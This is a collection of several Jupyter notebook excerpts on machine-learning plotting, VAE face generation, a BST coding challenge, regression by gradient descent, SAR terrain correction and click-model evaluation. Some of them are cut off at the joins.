0.4154, 0.4232, 0.4144, 
0.3770, 0.3981, 0.4024, 0.4159, 0.3808, 0.3764, 0.3764, 0.3724, 0.3980, 0.3866, 0.3599, 0.3640, 0.3640, 0.3868, 0.3955, 0.4026, 0.3515, 0.3702, 0.3685, 0.3582, 0.3502, 0.3768, 0.3673, 0.3775, 0.4151, 0.3834, 0.3653, 0.3944, 0.3809, 0.3836, 0.3806, 0.3992, 0.3585, 0.3917, 0.4079, 0.3658, 0.4287, 0.3915, 0.4031, 0.3929, 0.3585, 0.3454, 0.3649, 0.3966, 0.3683, 0.4039, 0.4115, 0.3630, 0.3824, 0.3943, 0.4042, 0.4022, 0.4036, 0.3766, 0.4097, 0.3498, 0.3530, 0.3660, 0.4135, 0.3876, 0.3353, 0.4189, 0.3772, 0.4196, 0.3968, 0.3739, 0.3972, 0.3880, 0.4015, 0.4123, 0.3755, 0.3893, 0.3839, 0.3943, 0.4226, 0.3586, 0.4082, 0.3896, 0.3598, 0.3765, 0.3780, 0.3899, 0.3835, 0.3658, 0.4031, 0.4266, 0.4078, 0.3769, 0.3637,] # from FCNet_001.txt %matplotlib inline font = {'size' : 20} matplotlib.rc('font', **font) fig_size = [6,6] plt.rcParams["figure.figsize"] = fig_size plt.plot(range(1, len(loss_train)+1), loss_train, 'b-', label="Train Loss") plt.plot(range(1, len(loss_val)+1), loss_val, 'r:', label="Test Loss") plt.legend(loc='upper right') plt.xlabel('Epoch') plt.ylabel('Loss') # plt.axis('equal') plt.title('Semi-Siamese Network') # axes = plt.gca() # axes.set_xlim([-0.01, 1.01]) # axes.set_ylim([-0.01, 1.01]) plt.show() ``` ## Draw ROC for On-board and On-ground models ``` # siamese resnet, on ground x1, y1 = [0.,0.,0.,0.01052632, 0.01052632, 0.02105263, 0.02105263, 0.06315789, 0.06315789, 0.16842105, 0.16842105, 0.18947368, 0.18947368, 0.30526316, 0.30526316, 1. ] ,[0., 0.01298701, 0.88311688, 0.88311688, 0.8961039, 0.8961039, 0.92207792, 0.92207792, 0.94805195, 0.94805195, 0.97402597, 0.97402597, 0.98701299, 0.98701299, 1. , 1. 
] # siamese squeezenet, on board x2, y2 = [0.,0.,0.,0.0106383,0.0106383,0.03191489,0.03191489, 0.04255319 ,0.04255319 ,0.05319149 ,0.05319149 ,0.06382979 ,0.06382979, 0.08510638, 0.08510638, 0.11702128 ,0.11702128 ,0.12765957 ,0.12765957, 0.13829787, 0.13829787, 0.17021277 ,0.17021277 ,0.18085106, 0.18085106, 0.21276596, 0.21276596, 0.22340426 ,0.22340426 ,0.40425532, 0.40425532, 1. ] ,[0. , 0.01282051, 0.70512821 ,0.70512821, 0.74358974, 0.74358974, 0.75641026, 0.75641026, 0.76923077, 0.76923077 ,0.80769231 ,0.80769231, 0.87179487, 0.87179487, 0.8974359 , 0.8974359 ,0.91025641 ,0.91025641, 0.92307692, 0.92307692, 0.93589744, 0.93589744 ,0.94871795 ,0.94871795, 0.96153846, 0.96153846, 0.97435897, 0.97435897 ,0.98717949 ,0.98717949, 1. , 1. ] %matplotlib inline font = {'size' : 20} matplotlib.rc('font', **font) fig_size = [10,10] plt.rcParams["figure.figsize"] = fig_size plt.axis('equal') plt.plot(x1, y1, 'b-', label="On-ground Model, AUC=0.987") plt.plot(x2, y2, 'y--', label="On-board Model, AUC=0.970") plt.legend(loc='lower right', prop={'size': 20}) plt.xlabel('FPR', fontdict={'fontsize':20}) plt.ylabel('TPR', fontdict={'fontsize':20}) plt.axis('equal') # plt.title('Result on '+phase+' Data') axes = plt.gca() axes.set_xlim([-0.01, 1.01]) axes.set_ylim([-0.01, 1.01]) plt.show() ``` ## Draw training loss for on-ground/on-board models ``` loss_ground = [4.2417, 4.1063, 4.0400, 4.0115, 4.0249, 3.9450, 4.0022, 3.9794, 3.9495, 3.9615, 3.8977, 3.8863, 3.8862, 3.8650, 3.8559, 3.8529, 3.8600, 3.8495, 3.8245, 3.8327, 3.8759, 3.8169, 3.8216, 3.8500, 3.8654, 3.8272, 3.8393, 3.8720, 3.7822, 3.8778, 3.8765, 3.8033, 3.8492, 3.8141, 3.8271, 3.8067, 3.8832, 3.8381, 3.8602, 3.8415, 3.8391, 3.8510, 3.7991, 3.8190, 3.8277, 3.8344, 3.8308, 3.8442, 3.8662, 3.8491,] loss_board = [4.4380 ,4.1775 ,4.0974 ,4.0635 ,4.0453 ,4.0572 ,4.0403 ,4.0316 ,4.0691 ,4.0024 ,4.0088 ,3.9564 ,3.9899 ,3.9672 ,3.9735 ,3.9503 ,3.9473 ,3.9667 ,3.9400 ,3.9579 ,3.9066 ,3.9184 ,3.8994 ,3.8897 ,3.9148 ,3.9462 
,3.9335 ,3.9409 ,3.9513 ,3.9596 ,3.9375 ,3.9072 ,3.9317 ,3.9406 ,3.9140 ,3.9235 ,3.9305 ,3.9356 ,3.9266 ,3.9162 ,3.9122 ,3.8943 ,3.8906 ,3.9546 ,3.9209 ,3.9399 ,3.9192 ,3.8956 ,3.9322 ,3.9269] %matplotlib inline font = {'size' : 20} matplotlib.rc('font', **font) fig_size = [10,10] plt.rcParams["figure.figsize"] = fig_size plt.plot(range(1, len(loss_ground)+1), loss_ground, 'b-', label="On-ground model") plt.plot(range(1, len(loss_board)+1), loss_board, 'r:', label="On-board model") plt.legend(loc='upper right') plt.xlabel('Epoch') plt.ylabel('Loss') # plt.axis('equal') # plt.title('Training Loss') # axes = plt.gca() # axes.set_xlim([-0.01, 1.01]) # axes.set_ylim([-0.01, 1.01]) plt.show() ```
github_jupyter
# Using Variational Autoencoder and Deep Feature Loss to Generate Faces From the "Using Variational Autoencoder to Generate Faces" example, we see that using VAE, we can generate realistic human faces, but the generated image is a little blury. Though, you can continue to tuning the hyper paramters or using more data to get a better result, in this example, we adopted the approach in [this paper](https://arxiv.org/abs/1610.00291). That is, instead of using pixel-by-pixel loss of between the original images and the generated images, we use the feature map generated by a pre-trained CNN network to define a feature perceptual loss. As you will see, the generated images will become more vivid. ``` from bigdl.nn.layer import * from bigdl.nn.criterion import * from bigdl.optim.optimizer import * from bigdl.dataset import mnist import datetime as dt from bigdl.util.common import * from glob import glob import os import scipy.misc import numpy as np from utils import * image_size = 148 Z_DIM = 100 ENCODER_FILTER_NUM = 32 # we use the vgg16 model, it should work on other popular CNN models # You can download them here (https://github.com/intel-analytics/analytics-zoo/tree/master/models # download the data CelebA, and may repalce with your own data path DATA_PATH = os.getenv("ANALYTICS_ZOO_HOME") + "/apps/variational-autoencoder/img_align_celeba" VGG_PATH = os.getenv("ANALYTICS_ZOO_HOME")+"/apps/variational-autoencoder/analytics-zoo_vgg-16_imagenet_0.1.0.model" init_engine() ``` ## Define the Model We are uing the same model as "Using Variational Autoencoder to Generate Faces" example. 
def conv_bn_lrelu(in_channels, out_channles, kw=4, kh=4, sw=2, sh=2, pw=-1, ph=-1):
    """Build a SpatialConvolution -> BatchNorm -> LeakyReLU(0.2) block."""
    block = Sequential()
    block.add(SpatialConvolution(in_channels, out_channles, kw, kh, sw, sh, pw, ph))
    block.add(SpatialBatchNormalization(out_channles))
    block.add(LeakyReLU(0.2))
    return block


def upsample_conv_bn_lrelu(in_channels, out_channles, out_width, out_height,
                           kw=3, kh=3, sw=1, sh=1, pw=-1, ph=-1):
    """Bilinear upsample to (out_width, out_height), then conv -> BN -> LeakyReLU(0.2)."""
    block = Sequential()
    block.add(ResizeBilinear(out_width, out_height))
    block.add(SpatialConvolution(in_channels, out_channles, kw, kh, sw, sh, pw, ph))
    block.add(SpatialBatchNormalization(out_channles))
    block.add(LeakyReLU(0.2))
    return block


def get_encoder_cnn():
    """Encoder graph: 4 strided conv blocks, then two Linear heads (mean, log-variance)."""
    inp = Input()
    # Four stride-2 conv blocks progressively halve the spatial size.
    feat = conv_bn_lrelu(3, ENCODER_FILTER_NUM)(inp)                             # 32 * 32 * 32
    feat = conv_bn_lrelu(ENCODER_FILTER_NUM, ENCODER_FILTER_NUM * 2)(feat)       # 16 * 16 * 64
    feat = conv_bn_lrelu(ENCODER_FILTER_NUM * 2, ENCODER_FILTER_NUM * 4)(feat)   # 8 * 8 * 128
    feat = conv_bn_lrelu(ENCODER_FILTER_NUM * 4, ENCODER_FILTER_NUM * 8)(feat)   # 4 * 4 * 256
    flat = View([4 * 4 * ENCODER_FILTER_NUM * 8])(feat)
    # Fully connected heads producing the latent Gaussian parameters.
    mean = Linear(4 * 4 * ENCODER_FILTER_NUM * 8, Z_DIM)(flat)
    log_variance = Linear(4 * 4 * ENCODER_FILTER_NUM * 8, Z_DIM)(flat)
    return Model([inp], [mean, log_variance])


def get_decoder_cnn():
    """Decoder graph: Linear from Z_DIM, 4 upsample blocks, Tanh output in [-1, 1]."""
    inp = Input()
    projected = Linear(Z_DIM, 4 * 4 * ENCODER_FILTER_NUM * 8)(inp)
    grid = Reshape([ENCODER_FILTER_NUM * 8, 4, 4])(projected)
    normed = SpatialBatchNormalization(ENCODER_FILTER_NUM * 8)(grid)
    # Progressive bilinear upsampling back to a 64x64 RGB image.
    up = upsample_conv_bn_lrelu(ENCODER_FILTER_NUM * 8, ENCODER_FILTER_NUM * 4, 8, 8)(normed)  # 8 * 8 * 128
    up = upsample_conv_bn_lrelu(ENCODER_FILTER_NUM * 4, ENCODER_FILTER_NUM * 2, 16, 16)(up)    # 16 * 16 * 64
    up = upsample_conv_bn_lrelu(ENCODER_FILTER_NUM * 2, ENCODER_FILTER_NUM, 32, 32)(up)        # 32 * 32 * 32
    up = upsample_conv_bn_lrelu(ENCODER_FILTER_NUM, 3, 64, 64)(up)                             # 64 * 64 * 3
    out = Tanh()(up)
    return Model([inp], [out])
def get_vgg():
    """Load pre-trained VGG-16 and keep only the sub-graph up to relu1_2.

    We use the vgg16 model; it should work on other popular CNN models.
    Pre-trained models are available at
    https://github.com/intel-analytics/analytics-zoo/tree/master/models
    Only one feature map is used here for the sake of simplicity and
    efficiency; more outputs could be added to mix high-level and
    low-level features for higher quality images.
    """
    vgg_whole = Model.from_jvalue(Model.loadModel(VGG_PATH).value)
    outputs = [vgg_whole.node(name) for name in ["relu1_2"]]
    inputs = [vgg_whole.node(name) for name in ["data"]]
    outputs[0].remove_next_edges()
    # Freeze so the perceptual-loss network is never updated during training.
    return Model(inputs, outputs).freeze()


def get_data():
    """Build the training RDD of Samples (zero placeholder label, image target)."""
    jpg_paths = glob(os.path.join(DATA_PATH, "*.jpg"))
    # Limit to the first 100k images; transpose HWC -> CHW for the network.
    images = sc.parallelize(jpg_paths[:100000]) \
        .map(lambda path: get_image(path, image_size).transpose(2, 0, 1))
    samples = images.map(
        lambda img: Sample.from_ndarray(img, [np.array(0.0), img]))
    return samples
def gen_image_row():
    """Decode 8 random latent vectors into one horizontal strip of 64x64 RGB images."""
    decoder.evaluate()
    tiles = []
    for _ in range(8):
        sample = decoder.forward(np.random.randn(1, Z_DIM))
        # CHW network output -> HWC image tile.
        tiles.append(sample.reshape(3, 64, 64).transpose(1, 2, 0))
    return np.column_stack(tiles)


def gen_image():
    """Generate an 8x8 grid of decoded images, mapped back to displayable pixel range."""
    rows = [gen_image_row() for _ in range(8)]
    return inverse_transform(np.row_stack(rows))
github_jupyter
This notebook was prepared by [Donne Martin](https://github.com/donnemartin). Source and license info is on [GitHub](https://github.com/donnemartin/interactive-coding-challenges). # Challenge Notebook ## Problem: Find the second largest node in a binary search tree. * [Constraints](#Constraints) * [Test Cases](#Test-Cases) * [Algorithm](#Algorithm) * [Code](#Code) * [Unit Test](#Unit-Test) * [Solution Notebook](#Solution-Notebook) ## Constraints * If this is called on a None input or a single node, should we raise an exception? * Yes * None -> TypeError * Single node -> ValueError * Can we assume we already have a Node class with an insert method? * Yes * Can we assume this fits memory? * Yes ## Test Cases * None or single node -> Exception <pre> Input: _10_ _/ \_ 5 15 / \ / \ 3 8 12 20 / \ \ 2 4 30 Output: 20 Input: 10 / 5 / \ 3 7 Output: 7 </pre> ## Algorithm Refer to the [Solution Notebook](http://nbviewer.ipython.org/github/donnemartin/interactive-coding-challenges/blob/master/graphs_trees/check_balance/check_balance_solution.ipynb). If you are stuck and need a hint, the solution notebook's algorithm discussion might be a good place to start. 
class Solution(Bst):

    def find_second_largest(self):
        """Return the node holding the second largest value in the BST.

        Returns:
            The Node with the second largest value.

        Raises:
            TypeError: If the tree's root is None.
            ValueError: If the tree contains only a single node.
        """
        if self.root is None:
            raise TypeError('root cannot be None')
        if self.root.left is None and self.root.right is None:
            raise ValueError('tree must contain at least two nodes')
        # The largest node is the right-most node; track its parent.
        parent = None
        node = self.root
        while node.right is not None:
            parent = node
            node = node.right
        if node.left is not None:
            # Largest node has a left subtree: the second largest is the
            # maximum (right-most) node of that subtree.
            node = node.left
            while node.right is not None:
                node = node.right
            return node
        # No left subtree under the largest node: its parent is second largest.
        return parent
github_jupyter
``` import numpy as np from mpl_toolkits.mplot3d import Axes3D from numpy import linalg as la from matplotlib import pyplot as plot ``` ## Reading the data First we load the data from the npz file ``` data = np.load('data/data.npz') x1 = data['x1'] x2 = data['x2'] y = data['y'] ``` ## Generating model Then we use the same model as mentioned in the homework ``` f0 = np.ones(len(x1)) f1 = x1 f2 = np.multiply(x2, x2) # x2^2 f3 = np.multiply(x1, f2) # x1 * x2^2 X = np.column_stack((f0, f1, f2, f3)) # 1, x1, x2^2, x1 * x2^2 y = np.transpose([y]) ``` ## Learning model parameters We use two method to learn the paramters: - Gradient Descent - Stochastic Gradient Descent As shown below, the Gradient Descent algorithm has a better result, but the overall performance of both algorithms are acceptably good. ``` beta_gd = [[1], [3], [2], [4]] step = 0.0001 for i in range(10000): derivation = np.matmul(np.matmul(np.transpose(X), X), beta_gd) - np.matmul(np.transpose(X), y) beta_gd = np.subtract(beta_gd, np.multiply(step, np.multiply(1 / la.norm(derivation, 2), derivation))) print('Beta from gradient descent is: ', beta_gd) print('Beta error on train data: ', np.linalg.norm(np.matmul(X, beta_gd) - y)) alpha = 0.01 beta_sgd = np.ones(shape=(4, 1)) X_temp = np.zeros(shape=(1, 4)) X_temp_T = np.zeros(shape=(4, 1)) Y_temp = np.zeros(shape=(1, 1)) for i in range(10000): myRand = np.random.randint(0, 8000, size=1) X_temp[0] = X[myRand[0]] Y_temp[0] = y[myRand[0]] X_temp_T = np.transpose(X_temp) Grad = np.matmul(np.matmul(X_temp_T, X_temp), beta_sgd) - np.matmul(X_temp_T, Y_temp) Grad = Grad / np.linalg.norm(Grad) beta_sgd = np.add(beta_sgd, np.multiply(-alpha, Grad)) print('Beta from stochastic gradient descent is: ', beta_sgd) print('Beta error on train data: ', np.linalg.norm(np.matmul(X, beta_sgd) - y)) ``` ## Testing the model and its parameters on the test data First we read the test data from the npz file. 
``` x1_t = data['x1_test'] x2_t = data['x2_test'] y_t = data['y_test'] ``` ## Generating test model Then we generate the test model, the same model as used in the training phase. ``` f0_t = np.ones(len(x1_t)) f1_t = x1_t f2_t = np.multiply(x2_t, x2_t) f3_t = np.multiply(x1_t, f2_t) X_t = np.column_stack((f0_t, f1_t, f2_t, f3_t)) y_t = np.transpose([y_t]) ``` ## Testing the learnt model paramters Then we use the SSE metric for measuring our learnt parameters' performance. As seen below, we plot the differences between the model predictions and the actual values in different colors on a 3D figure. The first figure and SSE corresponds to the parameters learnt with the gradient descent algorithm and the second one corresponds to the stochastic gradient descent algoirthm. ``` test_error = np.subtract(y_t, np.matmul(X_t, beta_gd)) print("SSE for gradient descent:", la.norm(test_error, 2)) fig = plot.figure() ax = fig.add_subplot(111, projection='3d') xs = x1_t ys = x2_t ax.scatter(xs, ys, np.matmul(X_t, beta_gd), c='b', marker='*') ax.scatter(xs, ys, y_t, c='r', marker='.') plot.show() test_error = np.subtract(y_t, np.matmul(X_t, beta_sgd)) print("SSE for stochastic gradient descent:", la.norm(test_error, 2)) fig = plot.figure() ax = fig.add_subplot(111, projection='3d') xs = x1_t ys = x2_t ax.scatter(xs, ys, np.matmul(X_t, beta_sgd), c='b', marker='*') ax.scatter(xs, ys, y_t, c='r', marker='.') plot.show() ```
github_jupyter
``` %load_ext autoreload %autoreload 2 %matplotlib inline %config InlineBackend.figure_format = 'retina' import matplotlib.pyplot as plt plt.rcParams["figure.figsize"] = (10, 7) plt.rcParams["font.size"] = 12 import inspect import numpy as np import xarray as xr import xarray_sentinel from sarsen import apps, geocoding, orbit, scene # uncomment to check that the code below is in sync with the implementation # print(inspect.getsource(apps.terrain_correction)) ``` # define input and load data ``` product_urlpath = ( "data/S1B_S6_GRDH_1SDV_20211216T115438_20211216T115501_030050_03968A_0F8A.SAFE/" ) measurement_group = "S6/VV" dem_urlpath = "data/Chicago-10m-DEM.tif" orbit_group = None calibration_group = None output_urlpath = "Chicago-10m-GTC-GRD.tif" interp_method = "nearest" multilook = None grouping_area_factor = (1.0, 1.0) open_dem_raster_kwargs = {"chunks": {}} kwargs = {"chunks": 2048} !ls -d {product_urlpath} !ls -d {dem_urlpath} orbit_group = orbit_group or f"{measurement_group}/orbit" calibration_group = calibration_group or f"{measurement_group}/calibration" measurement_ds = xr.open_dataset(product_urlpath, engine="sentinel-1", group=measurement_group, **kwargs) # type: ignore measurement = measurement_ds.measurement dem_raster = scene.open_dem_raster(dem_urlpath, **open_dem_raster_kwargs) orbit_ecef = xr.open_dataset(product_urlpath, engine="sentinel-1", group=orbit_group, **kwargs) # type: ignore position_ecef = orbit_ecef.position calibration = xr.open_dataset(product_urlpath, engine="sentinel-1", group=calibration_group, **kwargs) # type: ignore beta_nought_lut = calibration.betaNought ``` # scene ``` dem_raster _ = dem_raster.plot() %%time dem_ecef = scene.convert_to_dem_ecef(dem_raster) dem_ecef ``` # acquisition ``` measurement %%time acquisition = apps.simulate_acquisition(position_ecef, dem_ecef) acquisition %%time beta_nought = xarray_sentinel.calibrate_intensity(measurement, beta_nought_lut) beta_nought %%time coordinate_conversion = None if 
measurement_ds.attrs["sar:product_type"] == "GRD": coordinate_conversion = xr.open_dataset( product_urlpath, engine="sentinel-1", group=f"{measurement_group}/coordinate_conversion", **kwargs, ) # type: ignore ground_range = xarray_sentinel.slant_range_time_to_ground_range( acquisition.azimuth_time, acquisition.slant_range_time, coordinate_conversion, ) interp_kwargs = {"ground_range": ground_range} elif measurement_ds.attrs["sar:product_type"] == "SLC": interp_kwargs = {"slant_range_time": acquisition.slant_range_time} if measurement_ds.attrs["sar:instrument_mode"] == "IW": beta_nought = xarray_sentinel.mosaic_slc_iw(beta_nought) else: raise ValueError( f"unsupported sar:product_type {measurement_ds.attrs['sar:product_type']}" ) %%time geocoded = apps.interpolate_measurement( beta_nought, multilook=multilook, azimuth_time=acquisition.azimuth_time, interp_method=interp_method, **interp_kwargs, ) geocoded geocoded.rio.set_crs(dem_raster.rio.crs) geocoded.rio.to_raster( output_urlpath, dtype=np.float32, tiled=True, blockxsize=512, blockysize=512, compress="ZSTD", num_threads="ALL_CPUS", ) _ = geocoded.plot(vmax=1.0) ```
github_jupyter
``` # Copyright 2016 Google Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ################################################################################ # # Notebook to process the ratings and produce plots and tables. %matplotlib notebook %load_ext autoreload %autoreload 2 from __future__ import division import collections import csv import itertools import jsonpickle import math import numpy as np import multiprocessing import os import pandas as pd import pickle import scipy import seaborn as sns import sys import sklearn.cross_validation sys.path.append( os.path.abspath(os.path.join(os.path.dirname('__file__'), os.path.pardir))) import logs_processing.click_model as click_model from logs_processing.create_tasks import Action, LogItem current_palette = sns.color_palette() sns.palplot(current_palette) CF = '<DIRECTORY_WITH_THE_ANONYMIZED_DATASET>' SPAMMER_FILENAME = 'spammers_anonymized.txt' RESULTS_D = 'results_D_anonymized.csv' RESULTS_R = 'results_R_anonymized.csv' TASK_FILE = 'serps_anonymized.csv' USE_CF_TRUST = True ``` ## Read the data ### Read spammers data ``` spammers = set() with open(os.path.join(CF, SPAMMER_FILENAME)) as f: for worker_id in f: spammers.add(worker_id.rstrip()) print '%d spammers' % len(spammers) ``` ### Read ratings ``` log_id_to_rel = collections.defaultdict(click_model.RelContainer) log_id_to_query = {} good_worker_ratings = 0 total_ratings = 0 all_workers = set() with open(os.path.join(CF, RESULTS_D)) as results_D: for row in 
csv.DictReader(results_D): worker_id = row['cas_worker_id'] all_workers.add(worker_id) total_ratings += 1 if worker_id not in spammers: good_worker_ratings += 1 trust = float(row['cf_worker_trust']) if USE_CF_TRUST else 1 log_id = row['cas_log_id'] click_model.RelContainer.add_rel(log_id_to_rel[log_id].Ds, row['D'], trust) log_id_to_query[log_id] = row['cas_query_id'] print '(D) %.1f%% ratings form spammers' % (100 - 100 * good_worker_ratings / total_ratings) good_worker_ratings = 0 total_ratings = 0 yes_detailed = [] with open(os.path.join(CF, RESULTS_R)) as results_R: for row in csv.DictReader(results_R): worker_id = row['cas_worker_id'] all_workers.add(worker_id) total_ratings += 1 if worker_id not in spammers: good_worker_ratings +=1 trust = float(row['cf_worker_trust']) if USE_CF_TRUST else 1 log_id = row['cas_log_id'] click_model.RelContainer.add_rel(log_id_to_rel[log_id].Rs, row['R'], trust) query = row['cas_query_id'] if row['yes_detailed']: yes_detailed.append(row['yes_detailed']) old_query = log_id_to_query.setdefault(log_id, query) if old_query != query: print >>sys.stderr, ('The same log_id ' '(%s) maps to two different queries: [%s] and [%s]' % ( log_id, old_query, query)) sys.exit(1) print '%d items with complete relevance' % sum( 1 for r in log_id_to_rel.itervalues() if r) print '%d queries with at least one completely judged document' % len(set( log_id_to_query[k] for k, r in log_id_to_rel.iteritems() if r)) print '%d workers in total' % len(all_workers) print '(R) %.1f%% ratings form spammers' % (100 - 100 * good_worker_ratings / total_ratings) def percentages(counter): s = sum(counter.values()) return ['%s: %.1f%%' % (k, v / s * 100) for k, v in counter.most_common()] print percentages(collections.Counter(yes_detailed)) Ds = collections.Counter(x[0] for rel in log_id_to_rel.itervalues() for x in rel.Ds) Rs = collections.Counter(x[0] for rel in log_id_to_rel.itervalues() for x in rel.Rs) print percentages(Ds) print percentages(Rs) ``` ### 
Correlation between R and D ``` most_common_rel_labels = [] for rel in log_id_to_rel.itervalues(): most_common_rel_labels.append({'D': click_model.rel_most_common(rel.Ds), 'R': click_model.rel_most_common(rel.Rs)}) mc_rels = pd.DataFrame(most_common_rel_labels) scipy.stats.pearsonr(mc_rels['R'], mc_rels['D']) scipy.stats.spearmanr(mc_rels['R'], mc_rels['D']) ax = sns.regplot(x='R', y='D', data=mc_rels, x_jitter=.1, y_jitter=.1) ax.figure.savefig('R_D_correlation.pdf') ``` ### Read SERPs and logs ``` data = [] with open(os.path.join(CF, TASK_FILE)) as task_file: sat_labels = [] num_skipped = 0 num_sat_true = 0 num_total = 0 reader = csv.DictReader(task_file) for key, query_rows_iter in itertools.groupby(reader, key=lambda row: (row['cas_log_id'].split('_')[:-1], # SERP id row['cas_query_id'], row['sat_feedback'])): sat = key[2] if sat == 'undefined': print >>sys.stderr, 'Undefined sat label for query [%s]' % key[1] sat_labels.append(sat) sat = click_model.parse_sat(sat) if sat is None: num_skipped += 1 continue elif sat: num_sat_true += 1 data_row = {'query': key[1], 'sat': sat, 'session': [], 'serp': []} for row in query_rows_iter: data_row['session'].append(jsonpickle.decode(row['actions'])) data_row['serp'].append(click_model.Snippet(emup=row['emup'], cas_item_type=row['cas_item_type'], is_complex=row['is_complex'])) data.append(data_row) num_total += 1 print collections.Counter(sat_labels) print 'Skipped %d rows out of %d' % (num_skipped, num_total + num_skipped) print '%.1f%% of SAT labels in the data' % (num_sat_true / num_total * 100) print '%d queries left' % len(data) print '%d SERP items w/ ratings' % sum(sum(1 for l in row['session'] if log_id_to_rel[l.log_id]) for row in data) ``` ## Do the heavy lifting ``` MODELS = { 'CAS': click_model.CAS(log_id_to_rel), 'CASnod': click_model.CAS(log_id_to_rel, use_D=False), 'CASnosat': click_model.CAS(log_id_to_rel, sat_term_weight=0), 'CASnoreg': click_model.CAS(log_id_to_rel, reg_coeff=0), 'random': 
click_model.RandomSatModel(), 'PBM': click_model.PyClickModel('PBM', log_id_to_rel), 'UBM': click_model.PyClickModel('UBM', log_id_to_rel), 'DCG': click_model.DCG(log_id_to_rel), 'uUBM': click_model.uUBM(log_id_to_rel), } def compute_performance(index, train_data, test_data, result_queue): result = {} for name, model in MODELS.iteritems(): try: params = model.train(train_data) ll_values_test = [ model.log_likelihood(params, d['session'], d['serp'], d['sat'], f_only=True ) for d in test_data ] result[name] = {} result[name]['full'] = np.average([l.full for l in ll_values_test]) result[name]['click'] = np.average([l.clicks for l in ll_values_test]) result[name]['sat'] = np.average([l.sat for l in ll_values_test]) result[name]['utility'] = [model.utility(params, d['session'], d['serp']) for d in test_data] result[name]['sat pearson'] = scipy.stats.pearsonr( [int(d['sat']) for d in test_data], result[name]['utility'] )[0] except Exception, e: result[name] = sys.exc_info() result_queue.put((index, result)) N_REPETITIONS = 1 N_FOLDS = 3 N = len(data) data = np.array(data) result_queue = multiprocessing.Queue() workers = [] for rep_index in xrange(N_REPETITIONS): for fold_num, (train_index, test_index) in enumerate(sklearn.cross_validation.KFold(N, n_folds=N_FOLDS, shuffle=True, random_state=rep_index)): w = multiprocessing.Process(target=compute_performance, args=((rep_index, fold_num), data[train_index], data[test_index], result_queue)) workers.append(w) w.start() results = [] for i in xrange(len(workers)): try: results.append(result_queue.get(timeout=300)) print >>sys.stderr, i, except multiprocessing.TimeoutError: print >>sys.stderr, '..', print len(results) for w in workers: w.join() ``` ### Save the results ``` def flatten(results): out = [] for idx, result in results: for model, r in result.iteritems(): if isinstance(r, tuple): print >>sys.stderr, r else: out += [{'rep': idx[0], 'fold': idx[1], 'model': model, 'metric': k, 'value': v} for (k, v) in r.iteritems()] 
return out d = pd.DataFrame(flatten(results)) d.to_pickle('results.df') ``` ## Metric-metric correlation ``` def utility(rep, fold, model): return d[d['rep'] == rep][d['fold'] == fold][d['model'] == model][d['metric'] == 'utility'].iloc[0]['value'] #utility(0, 0, 'CAS') correlations = {} model_names = ['CASnod', 'CASnosat', 'CASnoreg', 'CAS', 'UBM', 'PBM', 'DCG', 'uUBM'] for i in xrange(len(model_names)): m1 = model_names[i] correlations[m1] = {} for m2 in model_names[:i]: vals = [] for rep in xrange(N_REPETITIONS): for fold in xrange(N_FOLDS): try: m1_utility = utility(rep, fold, m1) m2_utility = utility(rep, fold, m2) vals.append(scipy.stats.pearsonr(m1_utility, m2_utility)[0]) except IndexError as e: print >>sys.stderr, 'Missing value: rep=%d, fold=%d, m1=%s, m2=%s' % (rep, fold, m1, m2) continue correlations[m1][m2] = np.mean(vals) correlations = pd.DataFrame(correlations, index=model_names[:-1], columns=model_names[1:]) print correlations.to_latex(float_format=lambda x: '---' if math.isnan(x) else '%.3f' % x) ``` ### Complex SERPs ``` def is_complex(serp): return any(snippet.is_complex for snippet in serp) def apply_mask(iterable, mask, inverted=False): return [x for x, m in zip(iterable, mask) if (m if not inverted else not m)] N_REPETITIONS_COMPLEX = 20 model_names = [ # 'CASnod', 'CASnosat', 'CASnoreg', # 'CAS', # 'UBM', 'PBM', 'random', 'DCG', 'uUBM'] num_complex_serps = {} results = [] data = np.array(data) complex_serps = [is_complex(x['serp']) for x in data] for rep_index, (train_index, test_index) in enumerate(sklearn.cross_validation.StratifiedShuffleSplit( complex_serps, N_REPETITIONS_COMPLEX, test_size=1/24, random_state=0)): num_complex_serps[rep_index] = {} train_data = data[train_index] test_data = data[test_index] complex_serp_mask = [is_complex(x['serp']) for x in test_data] sat_labels = [int(x['sat']) for x in test_data] sat_labels_complex = apply_mask(sat_labels, complex_serp_mask) num_complex_serps[rep_index] = len(sat_labels_complex) for m 
in model_names: try: model = MODELS[m] params = model.train(train_data) m_utility = [model.utility(params, x['session'], x['serp']) for x in test_data] results.append({'rep': rep_index, 'model': m, 'utility': apply_mask(m_utility, complex_serp_mask), 'sat': sat_labels_complex}) except Exception as e: print >>sys.stderr, 'Exception at rep=%d, m=%s: %s' % (rep_index, m, str(e)) continue per_m_results = collections.defaultdict(lambda: {'u': [], 's': []}) for d in [pd.read_pickle('out_heterogeneous/%d.df' % i) for i in xrange(20)]: for c in d: r = d[c] u = r.utility s = r.sat assert len(u) == 1 assert len(s) == 1 per_m_results[r.name]['u'].append(u[0]) per_m_results[r.name]['s'].append(s[0]) for m, res in per_m_results.iteritems(): print m, scipy.stats.pearsonr(res['u'], res['s'])[0] sat_pearson = pd.DataFrame(results) sat_pearson ``` ## Plot Results ``` FIGS = '<DIRECTORY_TO_OUTPUT_FIGURES>' model_names = ['CASnod', 'CASnosat', 'CASnoreg', 'CAS', 'UBM', 'PBM', 'random', 'DCG', 'uUBM'] colors = sns.color_palette('Set1', n_colors=len(model_names), desat=0.3) pal = {m: colors[k] for k, m in enumerate(model_names)} def restyle(ax): ax.set_xlabel('') ax.set_ylabel('') ax.xaxis.grid(color='white') ax.set_xticklabels(ax.xaxis.get_majorticklabels(), rotation=30) models = ['CASnod', 'CASnosat', 'CASnoreg', 'CAS', 'UBM', 'PBM', 'random', 'uUBM', ] ``` ### Clicks LL ``` ax = sns.boxplot(x='model', y='value', data=d[d['metric'] == 'click'], order=models, palette=pal) restyle(ax) ax.set_ylim([-4.5, -1.4]) ax.figure.savefig(os.path.join(FIGS, 'll_click.pdf')) ``` ### Satisfaction LL ``` sat_data = d[d['metric'] == 'sat'][d['model'].isin(models)] sat_data.set_index(['model', 'rep', 'fold'], inplace=True, verify_integrity=True) sat_data.sort_index(inplace=True) sat_data = sat_data.set_value(('CASnosat', range(N_REPETITIONS), 